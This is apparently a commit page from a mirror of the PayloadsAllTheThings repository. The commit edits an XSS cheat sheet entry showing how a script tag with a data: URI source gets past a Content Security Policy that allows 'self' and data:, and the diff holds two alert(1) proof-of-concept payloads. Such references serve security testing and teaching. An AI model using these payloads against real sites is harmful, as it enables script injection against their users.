wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-04-18 23:33:51 +02:00
Code Issues Releases Activity

Update XSS README.md 

Remove unnecessary complexity from CSP bypass payload
This commit is contained in:
Markus 2021-10-01 16:10:23 +02:00 committed by GitHub
parent 0024e2a3a9
commit 7996b4f905
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
XSS Injection/README.md
View File

@ -1072,10 +1072,10 @@ Works for CSP like `script-src self`
### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072)
Works for CSP like `script-src 'self' data:`
Works for CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
```javascript
<script ?/src="data:+,\u0061lert%281%29">/</script>
<script src="data:,alert(1)">/</script>
```